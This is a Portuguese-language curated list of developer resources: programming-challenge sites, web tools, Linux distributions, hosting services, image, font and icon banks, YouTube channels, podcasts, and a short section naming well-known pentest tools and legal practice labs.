- [CodeForces](https://codeforces.com/) - Desafios de Programação Back-end com a compilação e testes feito pela plataforma porém sem IDE integrada
- [CodePen Challenges](https://codepen.io/challenges) - Desafios de Programação Front-end. IDE integrada
- [CoderByte](https://coderbyte.com/) - Desafios de Programação Back-end. IDE integrada
- [CodeSignal](https://app.codesignal.com/) - Desafios de Programação Back-end. IDE integrada
- [CodeWars](https://www.codewars.com/) - Desafios de Programação Back-end. IDE integrada
- [Codier](https://codier.io/challenge) - Desafios de Programação Front-end, análise dos resultados feita pela comunidade. IDE integrada
- [Codility](https://app.codility.com/) - Desafios de Programação Back-end. IDE integrada
- [Coding Games](https://www.codingame.com/) - Desafios Programação Back-end com foco em temática de jogos. IDE integrada
- [CSES](https://cses.fi/problemset/) - Desafios de Programação Back-end. IDE integrada
- [CSS Battle](https://cssbattle.dev/) - Batalhas temporárias de CSS. IDE integrada
- [DailyCodingProblem](https://www.dailycodingproblem.com/) - Desafios de Programação Back-end enviados por e-mail. Solução do problema Premium
- [Desafio333](https://github.com/codigofalado/desafio333) - O Desafio333 é um desafio bimestral SIMPLES com o objetivo de convidar a comunidade a conhecer novas ferramentas
- [DevChallenge](https://www.devchallenge.com.br/) - Site com desafios de front-end, back-end e mobile
- [DevChallenges.io](https://devchallenges.io/) - Site com projectos webs responsivos, front-end e full-stack
- [Edabit](https://edabit.com/) - Desafios de Programação Back-end. IDE integrada
- [Exercism.io](https://exercism.io/) - Desafios de Programação Back-end. Sem IDE integrada. Requer download de CLI.
- [Flex Box Defense](http://www.flexboxdefense.com/) - Desafio de Programação Front-end focados na propriedade flex box. IDE integrada.
- [Flex Box Froggy](https://flexboxfroggy.com/) - Desafio de Programação Front-end focados na propriedade flex box. IDE integrada.
- [Front End Challanged Club](https://piccalil.li/category/front-end-challenges-club) - Bogs com desafios de programação front-end
- [Frontend Challengens](https://github.com/felipefialho/frontend-challenges) - Repositório no GitHub com vários desafios solicitados reais solicitados por empresas
- [Frontend Mentor](https://www.frontendmentor.io/) - Desafios de Programação Front-end, análise dos resultados feita pela comunidade, sem IDE integrada
- [HackerRank](https://www.hackerrank.com/) - Desafios de Programação Back-end. IDE integrada
- [HackTheBox](https://www.hackthebox.eu/) - Site com laboratórios para praticar pentest de forma gratuita e legal
- [LeetCode](https://leetcode.com/) - Desafios de Programação Back-end. IDE integrada
- [BinarySearch](https://binarysearch.com/) - Desafios de Programação Back-end. IDE integrada
- [CodeAbbey](https://www.codeabbey.com/) - Desafios de Programação Back-end. IDE integrada
- [ProjectEuler](https://projecteuler.net/) - Desafios de Programação Back-end focado em problemas matemáticos. IDE integrada
- [Sphere Onlune Judge (SPOJ)](https://www.spoj.com/) - Desafios de Programação Back-end com a compilação e testes feito pela plataforma porém sem IDE integrada
- [TopCoder](https://arena.topcoder.com/) - Desafios e Arena de Programação Back-end. IDE integrada
- [URI/Beecrowd](https://www.beecrowd.com.br/) - Desafios Programação Back-end, matemáticos e SQL. IDE integrada
- [OsProgramadores](https://osprogramadores.com/desafios/) - Desafios de Lógica de Programação do grupo Os Programadores.
## 🛠️ Ferramentas para desenvolvedores WEB
- [Minimamente](https://www.minimamente.com/project/magic/)
- [Hamburgers](https://jonsuh.com/hamburgers/)
- [Hover Effects](https://ianlunn.github.io/Hover/)
## ⚒ Ferramentas para buscar projetos open source
- [Up for Grabs](http://up-for-grabs.net/)
- [Isse Hub](http://issuehub.pro/)
- [Code Triage](https://www.codetriage.com/)
- [First Timers Only](http://www.firsttimersonly.com/)
- [Your First Pr](https://twitter.com/yourfirstpr)
- [Github Explore](https://github.com/explore/)
## 🐧 Melhores distros linux para programadores
- [Pop!\_Os](https://pop.system76.com/) - Distribuição Linux Pop!\_Os
- [Arch Linux](https://archlinux.org/) - Distribuição Linux Arch Linux
- [Debian](https://www.debian.org/) - Distribuição Linux Debian
- [Ubuntu](https://ubuntu.com/) - Distribuição Linux Ubuntu
- [Fedora](https://getfedora.org/pt_BR/) - Distribuição Linux Fedora
- [Linux Mint](https://linuxmint.com/) - Distribuição Linux Mint
- [OpenSUSE](https://www.opensuse.org) - Distribuição Linux OpenSUSE
- [Kali Linux](https://www.kali.org) - Distribuição Linux Kali Linux
- [KDE Neon](https://www.neon.kde.org) - Distribuição Linux KDE Neon
- [Solus](https://www.getsol.us) - Distribuição Linux Solus
- [Tails](https://www.tails.boum.org) - Distribuição Linux Tails
- [Zorin OS](https://zorin.com/os/) - Distribuição Linux Zorin
- [Kubuntu](https://kubuntu.org/) - Distribuição Linux Kubuntu
## 🔗 Bibliotecas JavaScript
- [Lax.js](https://github.com/alexfoxy/lax.js)
- [Swiper](https://swiperjs.com/)
- [WOW](https://wowjs.uk/)
- [Animate](https://animate.style/)
- [ApexCharts](https://apexcharts.com/)
- [Particles.js](https://vincentgarreau.com/particles.js/)
- [ScrollMagic](https://scrollmagic.io/)
## ⚙️ 9 Ferramentas que todo DEV precisa conhecer
- [Unminify](https://unminify.com/) - Ferramenta desofuscação de códigos.
- [Figma](https://www.figma.com) - ferramenta para design de interfaces.
- [Insomnia](https://insomnia.rest) - é um API Client, uma ferramenta para fazer testes de API's.
- [Rive](https://rive.app) - ferramenta colaborativa de animação para apps, jogos e sites.
- [CloudCraft](https://www.cloudcraft.co) - plataforma com foco em criar desenhos de arquiteturas AWS.
- [BundlePhobia](https://bundlephobia.com) - site para descobrir o custo de adicionar um npm package no seu pacote.
- [Font Flipper](https://fontflipper.com) - Tinder das fontes, basta apertar X caso não goste e ❤ se você gostar, adicione aos favoritos já com o nome da fonte e faça o download pelo Google fonts.
- [VisBug](https://github.com/GoogleChromeLabs/ProjectVisBug) - é uma extensão de Chrome, criada pelo google, ferramenta de design que te permite mudar o layout das páginas da web desde o estilo de fontes até a posição dos elementos.
- [ThunderClient](https://www.thunderclient.io) - é um Rest API Client totalmente leve e compatível com Visual Studio Code. Idêntico ao Postman, ele serve para realizar testes com nossas requisções HTTP.
- [SmallDevTools](https://smalldev.tools/) - Ferramentas GRATUITAS para desenvolvedores, como codificador/decodificador, formatadores HTML/CSS/Javascript, minificadores, geradores de dados falsos ou de teste & muito mais
## 🎭 Sites para praticar UI/UX
- [Sharpen](https://sharpen.design/)
- [Daily UI](https://www.dailyui.co/)
- [UX Challenges](https://uxtools.co/challenges)
- [Drawerrr](https://drawerrr.com/challenge)
- [Uplabs](https://www.uplabs.com/challenges)
## ☁ Ferramentas para hospedar seu site
- [Github Pages](https://pages.github.com/) - Hospedado diretamente de seu repositório GitHub. Basta editar, enviar e suas alterações entrarão em vigor
- [Award Space](https://www.awardspace.com/) - Hospedagem gratuita na web + um subdomínio gratuito, PHP, MySQL, instalador de aplicativo, envio de e-mail e sem anúncios
- [Byet](https://byet.host/) - Hospedagem Gratuita e Serviços de Hospedagem Premium.
- [Infinity Free](https://infinityfree.net/) - Free Unlimited Web Hosting
- [1FreeHosting](http://www.1freehosting.com/) - Hospedagem de sites grátis com 100GB de largura de banda
- [Amazon Web Services](https://aws.amazon.com/pt/) - Serviço de aluguel de servidores e outros serviços
- [BlueHost](https://www.bluehost.com/) - Empresa americana de hospedagem de sites
- [DigitalOcean](https://www.digitalocean.com/) - Aluguel de servidores dedicados e compartilhados
- [DreamHost](https://www.dreamhost.com/) - Hospedagem de sites de alta disponibilidade
- [Embratel](https://www.embratel.com.br/cloud/hospedagem-de-sites) - Hospedagem de sites nacional
- [GoDaddy](https://br.godaddy.com/hosting/web-hosting) - Hospedagem de sites internacional
- [GoDaddy](https://br.godaddy.com/) - Empresa de aluguel de servidores compartilhados, dedicados e registro de domínio
- [Google Cloud](https://cloud.google.com/solutions/smb/web-hosting/) - Serviço de aluguel de servidores da Google
- [Heroku](https://www.heroku.com/) - Hospedagem de sites grátis com suporte à NodeJS, Java, Ruby, PHP, Python, Go, Scala e Clojure
- [HostGator](https://www.hostgator.com/) - Hospedagem compartilhada e dedicada para sites e serviços
- [Hostinger](https://www.hostinger.com.br/) - Hospedagem de sites
- [Hostoo](https://hostoo.io/) - Hospedagem de sites em cloud computing dedicado
- [iPage](https://www.ipage.com/) - Hospedagem de sites gringa com descontos para anúncios
- [KingHost](https://king.host/) - Hospedagem compartilhada e dedicada para sites e serviços de marketing por e-mail
- [Netlify](https://www.netlify.com/) - Hospedagem para sites estáticos que combina implantação global, integração contínua e HTTPS automático
- [One.com](https://www.one.com/pt-BR/) - Serviços gerais digitais (incluindo hospedagem de sites)
- [Oracle Cloud](https://www.oracle.com/br/cloud/) - Serviço de aluguel de servidores da Oracle
- [Surge](https://surge.sh/) - Hospedagem gratuita para páginas estáticas
- [Umbler](https://www.umbler.com/br) - Hospedagem compartilhada, cloud computing sob taxação de uso
- [Vercel](https://vercel.com/) - Hospedagem grátis de sites estáticos e serveless
## 🌌 Sites para inspirar o seu desenvolvimento
- [Product Hunt](https://www.producthunt.com/)
- [Namify](https://namify.tech/?ref=producthunt)
- [Dribbble](https://dribbble.com/)
- [Behance](https://www.behance.net/)
- [Pinterest](https://br.pinterest.com/)
- [Deviant Art](https://www.deviantart.com/)
- [Lapa](https://www.lapa.ninja/)
- [Hyper Pixel](https://hyperpixel.io/)
- [One Page Love](https://onepagelove.com/)
- [One Page Love Avatars](https://onepagelove.com/boring-avatars)
- [Land Book](https://land-book.com/)
- [Awwwards](https://www.awwwards.com)
- [Best Folios](https://www.bestfolios.com/home)
- [Sitesee](https://sitesee.co/)
- [Httpster](https://httpster.net/2021/jun/)
- [Builders Club](https://builders-club.com/)
- [CSS Nectar](https://cssnectar.com/)
- [Collect UI](https://collectui.com)
- [Best Web Site](https://bestwebsite.gallery)
## 📮 Banco de imagens gratuitas
- [500px](https://500px.com/creativecommons) - Banco de imagens gratuitas
- [Burst](https://pt.shopify.com/burst) - Plataforma de imagens do serviço de ecommerce Shopify
- [Cupcake](http://cupcake.nilssonlee.se/) - Imagens gratuitas para uso comercial
- [Banco De Imagens Com Diversidade](https://github.com/JulianaHelena5/BancoDeImagensComDiversidade) - Banco de imagens com pessoas diversas
- [DrawKIT](https://www.drawkit.io/) - Ilustrações para qualquer um usar
- [FlatIcon](https://www.flaticon.com) - Banco de ícones vetoriais
- [Flickr](https://flickr.com/) - Rede social de fotógrafos
- [FreeImages](https://pt.freeimages.com/) - Banco de imagens gratuitas
- [FreePik Stories](https://stories.freepik.com/) - Banco de ilustrações gratuitas
- [Freerange](https://freerangestock.com/index.php) - Banco de imagens gratuitas
- [Glaze](https://www.glazestock.com) - Banco de ilustrações, sem direitos autorais
- [Gratisography](https://gratisography.com/) - Banco de imagens gratuitas
- [Humaaans](https://www.humaaans.com/) - Ilustrações de humanóides
- [Icons8](https://icons8.com.br/) - Ícones em diversos estilos
- [Imgur](https://imgur.com/) - Plataforma com milhões de imagens
- [IraDesign](https://iradesign.io/illustrations) - Ilustrações editáveis de cores e objetos
- [Life of Pix](https://www.lifeofpix.com/) - Banco de imagens gratuitas
- [Little Visuals](https://littlevisuals.co/) - Banco de imagens gratuitas
- [Lorempixel](http://lorempixel.com/) - Banco de imagens para uso como template
- [Lukas Zadam](https://lukaszadam.com/illustrations) - Ilustrações SVG em diferentes tamanhos e estilos
- [ManyPixels](https://www.manypixels.co/gallery/) - Galeria de ilustrações com direito a edição de cores
- [Morguefile](https://morguefile.com/) - Banco de imagens gratuitas
- [Nappy](https://www.nappy.co) - Banco de imagens gratuitas (atribuição recomendada)
- [Nos.twnsnd](https://nos.twnsnd.co/) - Arquivo público de fotos antigas
- [OpenMoji](https://openmoji.org/) - Banco de emojis para uso
- [Pexels](https://www.pexels.com/) - Banco de imagens gratuitas
- [PhotoPin](http://photopin.com/) - Banco de imagens gratuitas no estilo criativo
- [Picjumbo](https://picjumbo.com/) - Banco de imagens gratuitas
- [Picsum](https://picsum.photos/) - Banco de imagens para uso como template
- [Pixabay](http://www.pixabay.com) - Banco de imagens gratuitas (não requer atribuição)
- [Public domain archive](https://www.publicdomainarchive.com/) - Banco de imagens gratuitas
- [RemixIcon](https://remixicon.com/) - Banco de Ícones para uso gratuito
- [StockSnap](https://stocksnap.io/) - Banco de imagens gratuitas (não requer atribuição)
- [unDraw](https://undraw.co/) - Ilustrações livres para usar
- [Unsplash](https://unsplash.com/) - Banco de imagens gratuitas
- [Visual Hunt](https://visualhunt.com/) - Banco de imagens gratuitas
- [Wikimedia Commons](https://commons.wikimedia.org/wiki/Main_Page) - Banco de imagens mundial
- [Noun Project](https://thenounproject.com/photos/) - Banco de imagens stock gratuitas
## 👔 Aumentando o network
- [Guia Dev Brasil](https://linktr.ee/guiadevbrasil) - Guia Dev Brasil
- [APDA](https://www.facebook.com/groups/osadpa/) - Associação de Programadores Depressivos Anônimos
- [Comunidade CodigoPraTodos](https://comunidade.codigopratodos.com/) - Comunidade CodigoPraTodos no Discord e Forum
- [Comunidade ColabCode](https://discord.gg/YeeEAYj) - Comunidade ColabCode no Discord
- [Comunidade Código Falado](https://discord.gg/3y4X9pm) - Comunidade do Código Falado no Discord
- [Comunidade PerifaCode](https://perifacode.com/) - Comunidade PerifaCode
- [Comunidade Rocketseat](https://discordapp.com/invite/gCRAFhc) - Comunidade Rocketseat no Discord
- [Dev.to](https://dev.to/) - Rede social para desenvolvedores
- [GitHub Community Forum](https://github.community/) - Comunidade de desenvolvedores do GitHub
- [Grupos no Telegram](http://listatelegram.github.io/) - Lista de grupos de tecnologia no Telegram
- [Tecnogrupo](https://www.facebook.com/groups/102474963422805/) - Grupo de Tecnologia do Tecnoblog
- [OsProgramadores](https://t.me/osprogramadores) - Grupo para incentivar o aprendizado de programação.
## 🎠 Sites para baixar e encontrar fontes
- [Adobe Fonts](https://fonts.adobe.com/)
- [Google fonts](https://fonts.google.com/)
- [Dafont](https://www.dafont.com/pt/)
- [NetFontes](https://www.netfontes.com.br/)
- [Urbanfonts](https://www.urbanfonts.com/pt/)
- [Befonts](https://befonts.com/)
- [Fonts space](https://www.fontspace.com/)
- [1001 fonts](https://www.1001fonts.com/)
- [Abstract fonts](https://www.abstractfonts.com/)
- [Fontget](https://www.fontget.com/)
- [Material Design Icons](https://materialdesignicons.com/)
## 🧵 Sites de paletas de cores
- [Paletton](https://paletton.com/)
- [Adobe Color](https://color.adobe.com/pt/create/color-wheel/)
- [Color Hunt](https://colorhunt.co/)
- [Happy Hues](https://www.happyhues.co/)
- [Coolors](https://coolors.co/)
- [Gradient Hunt](https://gradienthunt.com/)
- [Flat UI Colors](https://flatuicolors.com/)
- [Grabient](https://www.grabient.com/)
- [Pigment](https://pigment.shapefactory.co/)
- [WebGradient](https://webgradients.com/)
- [Color.lol](https://colors.lol/)
- [ColorBox](https://colorbox.io/)
- [ColorSpace](https://mycolor.space)
## 🎇 Lista de ilustrações
- [DrawKIT](https://www.drawkit.io/)
- [Humaaans](https://www.humaaans.com/)
- [Open Doodle](https://www.opendoodles.com/)
- [Storyset](https://storyset.com/)
- [unDraw](https://undraw.co/)
- [404 Illustrations (by kapwing)](https://www.kapwing.com/404-illustrations/)
- [404 Illustrations](https://error404.fun/)
- [Ouch](https://icons8.com.br/illustrations/)
- [Delesing](https://delesign.com/free-designs/graphics/)
- [Pixeltru](https://www.pixeltrue.com/free-illustrations/)
- [Iconscout](https://iconscout.com/)
- [Onfire Craftwork Design](https://onfire.craftwork.design/)
- [Openpeeps](https://www.openpeeps.com/)
## 🎆 Sites de icones
- [DrawKIT](https://drawkit.com/free-icons)
- [Eva Icons](https://akveo.github.io/eva-icons/#/)
- [Feather Icons](https://feathericons.com/)
- [Font Awesome](https://fontawesome.com)
- [Heroicons](https://heroicons.dev/)
- [Iconsvg](https://iconsvg.xyz/)
- [Icons8 Line Awesome](https://icons8.com/line-awesome/)
- [Icons8](https://icons8.com.br/)
- [Shape](https://shape.so/)
- [Flaticon](https://www.flaticon.com/br/)
- [Bootstrap icons](https://icons.getbootstrap.com/)
- [devicon](https://devicon.dev/)
- [Noun Project](https://thenounproject.com/)
- [Iconfinder](https://www.iconfinder.com/)
- [iconmonstr](https://iconmonstr.com/)
- [Reshot](https://www.reshot.com/)
- [Phosphor Icon](https://phosphoricons.com)
- [Thenounproject](https://thenounproject.com/)
## 🎥 Canais do youtube com conteúdo gratuito
- [Alura](https://www.youtube.com/user/aluracursosonline) - Uns camaradas legais que abordam os mais variados temas do mundo da tecnologia
- [CódigoFonteTV](https://www.youtube.com/user/codigofontetv) - Leon e Nilce da programação
- [Android Developers](https://www.youtube.com/user/androiddevelopers) - Canal oficial da comunidade de desenvolvedores do Android
- [CodeShow](https://www.youtube.com/CodeShowBR) - Canal sobre Python e Rust
- [CodigoPraTodos](https://www.youtube.com/channel/UClFE1N_sMek7cyvwsAK_XJQ) - Canal com lives de resolução de exercícios do CS50 e mais dicas de programação
- [Cod3r Cursos](https://www.youtube.com/channel/UCcMcmtNSSQECjKsJA1XH5MQ) - Canal com aulas e cursos gratuitos sobre diversas tecnlogias
- [CollabCode](https://www.youtube.com/channel/UCVheRLgrk7bOAByaQ0IVolg) - Lives insanas sobre JS, front-end, etc
- [Torne-se um Programador - Danilo Aparecido](https://www.youtube.com/c/DaniloAparecido) - Canal com + de 500 aulas e dicas sobre programação e negócios com programação.
- [Daniel Donda](https://www.youtube.com/c/DanielDonda) - Canal sobre administração de redes, carreiras e certificação, hacking, segurança da informação
- [Dev Samurai](https://www.youtube.com/channel/UC-lHCBqKEtnXA0SBtdOP0bw) - Canal sobre tecnologia e comunidade de desenvolvedores
- [DevMedia](https://www.youtube.com/channel/UClBrpNsTEFLbZDDMW1xiOaQ) - Canal de um dos maiores portais sobre programação do Brasil
- [DevSuperior](https://youtube.com/devsuperior) - Canal para estudantes e profissionais iniciantes
- [Diolinux](https://www.youtube.com/user/diolinux) - Canal sobre o mundo Unix e outras tecnologias
- [Erick Wendel](https://www.youtube.com/c/ErickWendelTreinamentos) - Canal com conteúdos inéditos e exclusivos sobre Node.js, Javascript
- [EspecializaTI](https://www.youtube.com/user/especializati) - Cursos gratuitos sobre PHP, Laravel, Linux e HTML+CSS
- [Fabio Akita](https://www.youtube.com/user/AkitaOnRails) - Canal sobre tecnologia e desenvolvimento
- [Facebook Developers](https://www.youtube.com/user/FacebookDevelopers) - Canal oficial da comunidade de desenvolvedores do Facebook
- [Felipe Deschamps](https://www.youtube.com/channel/UCU5JicSrEM5A63jkJ2QvGYw) - Desenvolvedor da Pagar.me e criador de robôs com inteligencia artificial
- [Felipe Elia](https://www.youtube.com/channel/UCD_26rOE3ClALcZreTkyIoQ) - Canal sobre programação para Web com foco em WordPress
- [Filho da nuvem](https://www.youtube.com/Filhodanuvem) - Canal sobre desenvolvimento de testes automatizados, GitHub, PHP, Golang e outras linguagens
- [Flutterando](https://www.youtube.com/channel/UCplT2lzN6MHlVHHLt6so39A) - Canal sobre desenvolvimento de interface com Flutter
- [Fábrica de Noobs](https://www.youtube.com/channel/UCGObNjkNjo1OUPLlm8BTb3A) - Canal com intruduções a conceitos básicos dentro da computação
- [Gabriel Pato](https://www.youtube.com/channel/UC70YG2WHVxlOJRng4v-CIFQ) - Canal sobre tecnologia e hacking
- [Giuliana Bezerra](https://www.youtube.com/@giulianabezerra) - Canal sobre desenvolvimento e arquitetura de software com Java e Spring
- [Google Developers](https://www.youtube.com/user/GoogleDevelopers) - Canal oficial da comunidade de desenvolvedores da Google
- [Guia do Programador](https://www.youtube.com/c/GuiadoProgramador) - Canal de cursos de NodeJS gratuitos
- [Guru da Ciência](https://www.youtube.com/user/LimaoAzeddo) - Canal sobre tecnologia e ciências
- [One Bit Code](https://www.youtube.com/c/OneBitCode) - Canal com aulas de React e Ruby
- [O Irmão mais Velho](https://www.youtube.com/channel/UC5cfBZHUQpcMvBJDBaX8-jg/featured) - Aprenda UX/UI, Web e Mobile e desenvolva o seu mindset
- [ProgramadorBR](https://www.youtube.com/channel/UCrdgeUeCll2QKmqmihIgKBQ) - Programador brasileiro com atual residência no Canadá
- [Programação Dinâmica](https://www.youtube.com/c/ProgramaçãoDinâmica) - Canal sobre Python, Ciencias de Dados, Machine learning e Inteligência Artificial
- [Rocketseat](https://www.youtube.com/channel/UCSfwM5u0Kce6Cce8_S72olg) - Projeto de ensino gratuito sobre as tecnologias mais quentes do mercado
- [Rodrigo Branas](https://www.youtube.com/user/rodrigobranas) - Canal sobre desenvolvimento web com foco em JavaScript
- [Roger Melo](https://www.youtube.com/c/RogerMelo) - Canal com aula e dicas de JavaScript puro
- [TekZoom](https://www.youtube.com/channel/UCPIAn-SWhJzBilt1MekO4Vg) - Canal raíz sobre tecnologia do YouTube
- [Universo Programado](https://www.youtube.com/channel/UCf_kacKyoRRUP0nM3obzFbg) - Canal sobre lógica por trás do desenvolvimento de inteligências artificiais
- [Vinícius Thiengo](https://www.youtube.com/c/ThiengoCalopsita/) - Canal com aulas de desenvolvimento android e técnicas de código limpo
- [Zero Bugs](https://www.youtube.com/c/ZeroBugs) - Canal sobre desenvolvimento web com PHP e JavaScript
- [Balta.io](https://youtube.com/c/baltaio) - Canal explicando uma ferramenta completa para auxiliar você em seu caminho para se tornar um desenvolvedor de respeito, - om mais de 80 cursos direcionados
- [CodAffection](https://youtube.com/c/CodAffection) - Este canal tem como objetivo ensinar e inspirar desenvolvedores a criar aplicativos
- [Codedamn](https://youtube.com/c/codedamn) - Canal sobre programação e tecnologia no geral
- [EspecializaTi](https://youtube.com/c/EspecializatiBr) - Canal de cursos Online de Desenvolvimento Web
- [Jose Carlos Macoratti](https://youtube.com/channel/UCoqYHkQy8q5nEMv1gkcZgSw) - Vídeo Aulas sobre a plataforma .NET e tecnologias web: C# , VB .NET , ASP .NET , ASP .NET MVC, ASP .NET Core, Entity Framework, Xamarin Forms, Xamarin Android, Angular, ADO .NET , SQL, Node, etc
- [Michelli Brito](https://youtube.com/c/MichelliBrito) - Canal sobre conteúdos de programação, arquitetura de software e carreira em TI
- [The Net Ninja](https://youtube.com/c/TheNetNinja) - Habilidades de desenvolvimento web. Mais de 1000 tutoriais de programação gratuitos sobre
- [Vinícius Thiengo](https://youtube.com/c/ThiengoCalopsita) - Vídeos tutoriais sobre desenvolvimento Android e técnicas de código limpo
- [Traversy Media](https://youtube.com/c/TraversyMedia) - Traversy Media apresenta os melhores tutoriais de desenvolvimento e programação da web on-line para todas as tecnologias da web mais recentes
- [Mango](https://youtube.com/c/MangoDeveloper) - Cursos avançados completos utilizando Clean Architecture, TDD, SOLID principles e design patterns
- [Academind](https://youtube.com/c/Academind) - Cursos e tutoriais que ensinam tudo relacionado ao desenvolvimento web
- [Simon Grimm](https://youtube.com/user/saimon1924) - Tutoriais Ionic semanalmente com dicas e truques para melhorar seus aplicativos híbridos!
- [freeCodeCamp.org](https://youtube.com/c/Freecodecamp) - Aprenda a codificar gratuitamente.
- [Igor Remas](https://youtube.com/c/IgorRemas) - Desenvolvimento Web
- [Santos Enoque](https://youtube.com/c/SantosEnoque) - Ensinar as pessoas a construir softwares do mundo real e garantir que elas tenham habilidades que são realmente necessárias no mercado
- [Raja Yogan](https://youtube.com/channel/UCjBxAm226XZvgrkO-JyjJgQ) - Fornecendo tutoriais de tecnologia de qualidade para todos.
- [DesignCourse](https://youtube.com/c/DesignCourse) - Tutoriais sobre UI / UX, Frontend Dev, Backend Dev, Design gráfico e muito mais!
- [London App Brewery](https://youtube.com/c/Londonappbrewery) - Ensinam desenvolvimento Web para iniciantes, como fazer aplicativos iOS, Flutter e Android, bem como ciência de dados
- [EDMT Dev](https://youtube.com/c/eddydn71) - Tutoriais para code e hacking
- [Curso em Vídeo](https://www.youtube.com/user/cursosemvideo) - Cursos em vídeo-aulas totalmente gratuitos, criados pelo Professor Gustavo Guanabara
- [Thizer Aplicativos](https://youtube.com/c/ThizerAplicativos) - Tecnologia no Geral
- [Loiane Groner](https://youtube.com/c/loianegroner) - Canal com aulas gratuitas sobre Java, Sencha (Ext JS), JavaScript, Angular e desenvolvimento mobile com Cordova e Ionic.
- [Canal dotNET](https://youtube.com/c/CanalDotNET) - Canal sobre .NET C#
- [Protocolo Alterado](https://youtube.com/c/ProtocoloAlterado) - Conteúdos sobre Programação e Desenvolvimento Web por Beto Muniz.
- [Dev Soutinho](https://youtube.com/c/DevSoutinho) - Conteúdos sobre Programação por Mario Souto
- [Simplificando TI](https://www.youtube.com/channel/UCwn-9qpyukBnuA3eB-3F0Sg) - Conteúdo de TI no geral
- [Vida de Programador](https://www.youtube.com/c/ProgramadorREAL) - Conteúdo sobre tecnologia e programação
- [ProfessorRamos](https://www.youtube.com/c/professorramos/) - Conteúdo de informática e afins
- [Professor José de Assis](https://www.youtube.com/c/RoboticapraticaBr/) - Arduino com foco em robótica educacional, Programação Linguagem C, Java e desenvolvimento WEB, Linux com foco em servidores de rede
- [zer01ti](https://www.youtube.com/c/zero1ti/) - Novidades da tecnológica
- [Rafaella Ballerini](https://www.youtube.com/user/RafaellaBallerini/) - Experiência no mundo tech e dicas sobre como se encaixar na área.
- [Tech Primers](https://www.youtube.com/channel/UCB12jjYsYv-eipCvBDcMbXw) - TechPrimers é um canal educacional para fornecer insights sobre implementações de tecnologia
- [DevDojo](https://www.youtube.com/channel/UCjF0OccBT05WxsJb2zNkL4g) - Tutoriais sobre programação, playlist, e conteúdo sobre a área de informática
- [Descompila](https://www.youtube.com/c/Descompila/) - Vídeo-aulas de programação objetivas
- [Ka Solution Oficial](https://www.youtube.com/c/UnicornCoder/) - Nesse canal, vamos abordar temas referente ao mercado de tecnologia e dar excelentes dicas de carreira.
- [UnicornCoder](https://www.youtube.com/c/KaSolutionOficial/) - Videos de programação e cursos
- [TekZoom - Reinaldo Silotto](https://www.youtube.com/c/CanalTekZoom/) - Compartilhar conteúdos sobre tecnologia, programação, gadgets e dispositivos móveis, como smartphones e tablets.
- [Bonieky Lacerda](https://www.youtube.com/c/BoniekyLacerdaLeal) - Cursos de programação
- [Programador BR](https://www.youtube.com/c/Programadorbr) - Programação, carreira e empreendedorismo
- [ZUP](https://www.youtube.com/c/ZUPIT/) - Canal sobre tecnologia
- [Beer and Code](https://www.youtube.com/c/BeerandCode/) - Faça seu futuro com as tecnologias mais utilizadas nas Startups de sucesso.
- [Attekita Dev](https://www.youtube.com/c/AttekitaDev/) - Engenheira de software entusiasta em UX, com mais de mais de 20 aplicativos publicados na App Store
- [Web Dev Simplified](https://www.youtube.com/c/WebDevSimplified/) - Web Dev Simplified tem tudo a ver com o ensino de habilidades e técnicas de desenvolvimento web de maneira eficiente e prática
- [Escola Front-end](https://www.youtube.com/c/EscolaFrontend/) - Conteúdo sobre Front-end
- [Programe seu futuro](https://www.youtube.com/c/ProgrameseufuturoComWagnerGaspar) - Programação, Algoritmos e Lógica de Programação
- [CFBCursos](https://www.youtube.com/c/cfbcursos) - Canal de cursos/aulas de informática que disponibiliza conteúdo de qualidade e gratuito
- [Coding Snow](https://www.youtube.com/channel/UCNDmzGYwwT3rdY3xQuW8QOA) - Coding Snow é um canal para design e desenvolvimento criativo da Web, designs de front-end, designs de interface do usuário, Web design responsivo e designs de back-end usando HTML, CSS, Javascript / JQuery, PHP, MYSQL
- [Pessonizando](https://www.youtube.com/c/pessonizando) - Canal fala sobre Programação, Teste de Software, Carreira em Computação e como é viver e trabalhar com TI na EUROPA.
- [Lama Dev](https://www.youtube.com/c/LamaDev) - Tutoriais de desenvolvimento da Web para todos. Aprenda JavaScript, React.js, Node.js e encontre inspiração para HTML, CSS e web design com Lama e torne-se um desenvolvedor web.
- [Pisani da Arch](https://www.youtube.com/c/ArcHOfficeTech) - É um canal com conteúdos voltados para Arquitetura de Solução, onde o objetivo é ajudar a comunidade de Devs e Archs a projetarem soluções com os melhores padrões do mercado.
- [Nick Chapsas](https://www.youtube.com/c/Elfocrash) - Canal de um engenheiro de software de Londres com tutoriais e dicas de ferramentas Microsoft (ASPNET Core, C#, etc)
- [Tiago Aguiar](https://www.youtube.com/c/TiagoAguiar) - Canal de um desenvolvedor mobile com experiência em Android & IOS.
## 🔓 Pentest
- [Beef-Project](https://beefproject.com/) - Framework de exploração de browser
- [Capture The Flag - CTF](https://capturetheflag.com.br/) - Desafios reais de hacking, desenvolvido por especialistas brasileiros
- [HackTheBox](https://www.hackthebox.eu/) - Site com laboratórios para praticar pentest de forma gratuita e legal
- [HStrike](https://hstrike.com/) - Ferramentas de pentest em nuvem
- [HTTRack](http://www.httrack.com/) - Browser utility
- [Maltego](https://www.paterva.com/) - Ambiente open source para análise de redes completa
- [NMap](https://nmap.org/) - Scanner de portas de rede
- [picoCTF](https://picoctf.com/) - Jogo gratuito de segurança de computador voltado para alunos do ensino fundamental, médio e iniciantes
- [SQLMap](http://sqlmap.org/) - Ferramenta de teste de penetração open source que automatiza injeção de SQL
- [TryHackMe](https://tryhackme.com/) - Plataforma com laboratórios para aprender sobre pentest de maneira prática e teórica
- [Hack This Site](https://www.hackthissite.org/) - Site de desafios de hacking focado em web apps, irc, esteganografia, etc
## 🎙 Blogs e Podcasts
- [DevNaEstrada](https://devnaestrada.com.br/) - Desenvolvimento web em geral
- [Dicas de programação](https://dicasdeprogramacao.com.br/): Dicas para
- [PodProgramar](https://podprogramar.com.br/) - Focado em programação, notícias e histórias da área
- [Podcast OsProgramadores](https://osprogramadores.com/podcast) - Tudo que você sempre quis saber sobre Programação vida de programador, e também como chegar lá. Entrevistas com profissionais reconhecidos Nacional e Internacionalmente.
- [Hipsters.tech](https://hipsters.tech/) - Desenvolvimento de aplicações, design digital, startups e tecnologias em geral
- [LinuxTips](https://www.linuxtips.io/podcast) - Linux, DevOps, Docker e T.I
- [É tudo nuve](https://www.etudonuve.com.br/i/) - Pesquisa
- [Dev.to](https://dev.to/) - Rede social para desenvolvedores
- [Playcode](https://playcode.com.br/) - Site com algumas dicas para programação
- [Codenation](https://deploy.codenation.com.br/podcasts/home)
